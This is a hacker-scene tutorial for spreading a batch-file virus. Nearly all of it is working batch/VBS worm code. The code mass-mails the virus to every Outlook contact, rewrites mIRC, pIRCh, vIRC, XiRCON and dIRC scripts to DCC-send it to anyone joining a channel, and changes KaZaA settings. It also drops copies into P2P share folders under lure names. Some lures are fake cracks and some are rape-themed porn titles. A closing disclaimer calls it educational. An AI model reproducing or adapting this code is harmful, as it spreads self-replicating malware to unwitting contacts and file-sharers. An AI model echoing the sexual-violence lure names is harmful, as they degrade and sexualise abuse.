TUTORIAL: Batch IRC/Outlook Spreading By cOrRuPt G3n3t!x Welcome back to my 3rd batch tutorial of which we shall now discuss how to spread your batch virus over IRC (Internet Chat Relay) and MS Outlook. I have seen many different methods, but these seem to be the best so far. I will show how to spread over mIRC, pIRCh, VIRC, dIRC, XiRCON, KazaA, morpheus, limewire, bearshare etc... I would like to say thanks to SPTH for some of his IRC scripts although i needed to edit some as it would not run on my system! Please remember all these scripts are working BATCH scripts! 1)MS Outlook: ---------- MS Outlook has for many years been an excellent way of spreading virii. The actual script to spread over MS Outlook is a VBS but we shall adapt it to be able to work in batch. See below: -------------------------------[Cut Here]-------------------------------------- echo.on error resume next>>C:\MSO.vbs echo.dim a,b,c,d,e>>C:\MSO.vbs echo.set a=Wscript.CreateObject("Wscript.Shell")>>C:\MSO.vbs echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs echo.set c=b.GetNameSpace("MAPI")>>C:\MSO.vbs echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs echo.set d=c.AddressLists(y)>>C:\MSO.vbs echo.x=1 '>>C:\MSO.vbs echo.set e=b.CreateItem(0)>>C:\MSO.vbs echo.for o=1 To d.AddressEntries.Count>>C:\MSO.vbs echo.f=d.AddressEntries(x)>>C:\MSO.vbs echo.e.Recipients.Add f>>C:\MSO.vbs echo.x=x+1>>C:\MSO.vbs echo.next>>C:\MSO.vbs echo.e.Subject="Your Subject here">>C:\MSO.vbs echo.e.Body="Your Body here">>C:\MSO.vbs echo.e.Attachments.Add("c:\p2pdon.bat")>>C:\MSO.vbs echo.e.DeleteAfterSubmit=False>>C:\MSO.vbs echo.e.Send>>C:\MSO.vbs echo.f ="">>C:\MSO.vbs echo.next>>C:\MSO.vbs call C:\MSO.vbs Del C:\MSO.vbs -------------------------------[Cut Here]-------------------------------------- Next to customize this script for your batch look at lines 15, 16 and 17. You will enter the subject of your e-mail in line 15 then the main body in line 16 an finally where your virus is located in line 17. 2)mIRC: ----- Next we will spread over mIRC a well known IRC. mIRC has a long list of possible places it could be installed too so lets begin: -------------------------------[Cut Here]-------------------------------------- copy %0 "%SystemDrive%\Windows\WinDef.bat" if exist "%SystemDrive%\mirc\" goto m1 if exist "%ProgramFiles%\mirc\" goto m2 goto piRCh :m1 echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs echo.set scriptini=fso.CreateTextFile("C:\mirc\script.ini")>>C:\mscript.vbs echo.scriptini.WriteLine "[script]">>C:\mscript.vbs echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs echo.scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }">>C:\mscript.vbs echo.scriptini.WriteLine "n2= /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs echo.scriptini.close>>C:\mscript.vbs call C:\mscript.vbs del C:\mscript.vbs goto pIRCh :m2 echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs echo.set scriptini=fso.CreateTextFile("C:\Program Files\mirc\script.ini")>>C:\mscript.vbs echo.scriptini.WriteLine "[script]">>C:\mscript.vbs echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs echo.scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }">>C:\mscript.vbs echo.scriptini.WriteLine "n2= /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs echo.scriptini.close>>C:\mscript.vbs call C:\mscript.vbs del C:\mscript.vbs :pIrCh -------------------------------[Cut Here]------------------------------------------- Now this is working script for mIRC, all you need to change is the GOTO prameters, according to what you want mIRC to goto which are lines 3 and 15, next you will have to also change where your virus is allocated lines 1, 10 and 22 near the end of the statement! All this will do is make the script in C:\ directory, call it and then delete it. 3)pIRCh: ------- Another well known IRC which we shall spread through. See below for the working batch script: -------------------------------[Cut Here]-------------------------------------------- If not exist "C:\Pirch98\" goto kazaA if exist "%SystemDrive%\Pirch98\" goto p_inf :p_inf copy %0 "%SystemDrive%\Pirch98\WinDef.bat" echo.Dim pirch>>C:\pirch.vbs echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\pirch.vbs echo.set pirch=fso.CreateTextFile("C:\pirch98\events.ini")>>C:\pirch.vbs echo.pirch.WriteLine "[Levels]">>C:\pirch.vbs echo.pirch.WriteLine "Enabled=1">>C:\pirch.vbs echo.pirch.WriteLine "Count=6">>C:\pirch.vbs echo.pirch.WriteLine "Level1=000-Unknows">>C:\pirch.vbs echo.pirch.WriteLine "000-UnknowsEnabled=1">>C:\pirch.vbs echo.pirch.WriteLine "Level2=100-Level 100">>C:\pirch.vbs echo.pirch.WriteLine "100-Level 100Enabled=1">>C:\pirch.vbs echo.pirch.WriteLine "Level3=200-Level 200">>C:\pirch.vbs echo.pirch.WriteLine "200-Level 200Enabled=1">>C:\pirch.vbs echo.pirch.WriteLine "Level4=300-Level 300">>C:\pirch.vbs echo.pirch.WriteLine "300-Level 300Enabled=1">>C:\pirch.vbs echo.pirch.WriteLine "Level5=400-Level 400">>C:\pirch.vbs echo.pirch.WriteLine "400-Level 400Enabled=1">>C:\pirch.vbs echo.pirch.WriteLine "Level6=500-Level 500">>C:\pirch.vbs echo.pirch.WriteLine "500-Level 500Enabled=1">>C:\pirch.vbs echo.pirch.WriteLine "[000-Unknowns]">>C:\pirch.vbs echo.pirch.WriteLine "User1=*!*@*">>C:\pirch.vbs echo.pirch.WriteLine "UserCount=1">>C:\pirch.vbs echo.pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\Windef.bat">>C:\pirch.vbs echo.pirch.WriteLine "EventCount=1">>C:\pirch.vbs echo.pirch.WriteLine "[100-Level 100]">>C:\pirch.vbs echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs echo.pirch.WriteLine "[200-Level 200]">>C:\pirch.vbs echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs echo.pirch.WriteLine "[300-Level 300]">>C:\pirch.vbs echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs echo.pirch.WriteLine "[400-Level 400]">>C:\pirch.vbs echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs echo.pirch.WriteLine "[500-Level 500]">>C:\pirch.vbs echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs echo.pirch.Close>>C:\pirch.vbs call C:\pirch.vbs del C:\pirch.vbs :kazaA -------------------------------[Cut Here]------------------------------------------------------- There is the full script, once again, GOTO parameters need to be changed accordingly(lines 1 and last line) than also lines 4 and 26 need to be changed according to where your virus is. 4)KazaA: ------ Another IRC, pretty simple see below: -------------------------------[Cut Here]-------------------------------------------------------- if exist "%SystemDrive%\Kazaa\" goto vIRC if exist "%SystemDrive%\Kazaa\" goto kazaa_inf :kazaa_inf copy %0 "%SystemDrive%\Kazaa\" echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\k.vbs echo.set shell=CreateObject("WScript.Shell")>>C:\k.vbs echo.shell.RegWrite "HKLM\Software\KaZaA\Transfer\DlDir0", "C:\Kazaa\">>C:\k.vbs call C:\k.vbs del C:\k.vbs :vIRC -------------------------------[Cut Here]--------------------------------------------------------- Just make sure you copy your virus into the directory 'C:\Kazaa'!!! By now im sure you've got the hang of changing Parameters! so go ahead you can do it :) 5)vIRC: ----- We now see a similar script as above for vIRC just put it under your infection routine and change the paths etc to your batchs': -------------------------------[Cut Here]---------------------------------------------------------- if exist "%SystemDrive%\Virc\" goto v_inf if not exist "%SystemDrive%\Virc\" goto XiRCON :v_inf copy %0 "%SystemDrive%\Virc\WinDef.bat" echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\v.vbs echo.set shell=CreateObject("WScript.Shell")>>C:\v.vbs echo.shell.RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\WinDef.bat">>C:\v.vbs call C:\v.vbs del C:\v.vbs :XiRCON -------------------------------[Cut Here]---------------------------------------------------------- 6)XiRCON: ------- This is a IRC spreading technique for XiRCON just change paths and names for your batch(Thanks to SPTH): -------------------------------[Cut Here]---------------------------------------------------------- IF EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" goto inf_xircon IF NOT EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" GOTO dIRC :inf_xircon echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\xi.vbs echo.set xi=fso.CreateTextFile("C:\Default.tcl")>>C:\xi.vbs echo.xi.writeline " on ctcp {">>C:\xi.vbs echo.xi.writeline " foreach n [channels] {">>C:\xi.vbs echo.xi.writeline " if {$n != [my_nick]} {">>C:\xi.vbs echo.xi.writeline " /dcc send $n C:\Windows\WinDef.bat">>C:\xi.vbs echo.xi.writeline " }">>C:\xi.vbs echo.xi.writeline " }">>C:\xi.vbs echo.xi.writeline "}">>C:\xi.vbs copy %0 "%SystemDrive%\Virc\WinDef.bat" del /f /q "%SystemDrive%\Program Files\XiRCON\Default.tcl" call C:\xi.vbs del C:\xi.vbs copy "C:\Default.tcl" "%SystemDrive%\Program Files\XiRCON\Default.tcl" :dIRC -------------------------------[Cut Here]------------------------------------------------------------ 7)dIRC: ------ There are a bit more options on this script, you can either add your new script to the existing one or make a whole new one entirely, SPTH decided to make a new one so let us go with his advice as above just change paths and goto parameter as needed by your batch: -------------------------------[Cut Here]------------------------------------------------------------- if exist "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" goto inf_dirc >nul if exist not "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" goto randomspread :inf_dirc copy %0 "%SystemDrive%\Windows\WinDef.bat" echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\dirc.vbs echo.set dirc=fso.CreateTextFile("C:\virus.dsf")>>C:\dirc.vbs echo.dirc.writeline "#commands">>C:\dirc.vbs echo.dirc.writeline "#VBScript">>C:\dirc.vbs echo.dirc.writeline "!!! Do not edit the contents of this file. !!!">>C:\dirc.vbs echo.dirc.writeline "">>C:\dirc.vbs echo.dirc.writeline "#EVENT# vir Join * * on">>C:\dirc.vbs echo.dirc.writeline "sendcommand /dcc send & Nick & C:\Windows\WinDef.bat">>C:\dirc.vbs echo.dirc.writeline "===">>C:\dirc.vbs call C:\dirc.vbs del C:\dirc.vbs copy "C:\virus.dsf" "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" >nul echo.C:\Programme\Dragonmount Networks\dIRC\scripts\standard.dsf commands VBScript>>scripts.drc echo.C:\Programme\Dragonmount Networks\dIRC\scripts\virus.dsf commands VBScript>>scripts.drc :randomspread -------------------------------[Cut Here]------------------------------------------------------------- 8)Random Share Spread (RSS): ------------------------- This is just random spreading through a multitude of different shareware sites: just add to the spread routine in your code: -------------------------------[Cut Here]------------------------------------------------------------- :randomspread: COPY %0 "%SystemDrive%\mydocu~1\Crysis_keygen.bat" >nul COPY %0 "%SystemDrive%\mydocu~1\Kaspersky_Antivirus_10_Limited_Edition.url.bat" >nul COPY %0 "%SystemDrive%\kazaa\myshar~1\FHM_2009_MODELS.jpg.bat" >nul COPY %0 "%ProgramFiles%\applej~1\incoming\Windows_Vista_Crack.bat" >nul COPY %0 "%ProgramFiles%\bearsh~1\shared\XXX_SITE_PASSWORDS.bat" >nul COPY %0 "%ProgramFiles%\eDonkey2000\incoming\Teen_Forced_To_Suck.wmv.bat" >nul COPY %0 "%ProgramFiles%\emule\incoming\Windows7_RC1_Downloader.bat" >nul COPY %0 "%ProgramFiles%\grokster\mygrok~1\ICE_AGE_3.wmv.bat" >nul COPY %0 "%ProgramFiles%\icq\shared~1\Norton_AV_2009_CRACKED.exe.bat" >nul COPY %0 "%ProgramFiles%\kazaa\myshar~1\EBONY_WHORE_RAPED.mp4.bat" >nul COPY %0 "%ProgramFiles%\kazaal~1\myshar~1\VisualC_Keygen_2009.bat" >nul COPY %0 "%ProgramFiles%\kmd\myshar~1\EXPLOITED_ASIANS.wmv.bat" >nul COPY %0 "%ProgramFiles%\limewire\shared\ASS_LICKERS.MOV.bat" >nul COPY %0 "%ProgramFiles%\morpheus\myshar~1\Hard_Russian_rape.wmv.bat" >nul COPY %0 "%ProgramFiles%\overnet\bundles\Virgins_1st_fuck.mp4.bat" >nul exit -------------------------------[Cut Here]------------------------------------------------------------- I have been writing this tutorial for well over 2 hours now, so it's time for me to go, If you have any bugs or queries e-mail them to me at and i'll do my best to help. Remember this is for educational purpose only! ;) Let me jus batch off!! This is Corrupt Genetix signing out. REMEMBER THIS IS FOR EDUCATIONAL PURPOSES ONLY!!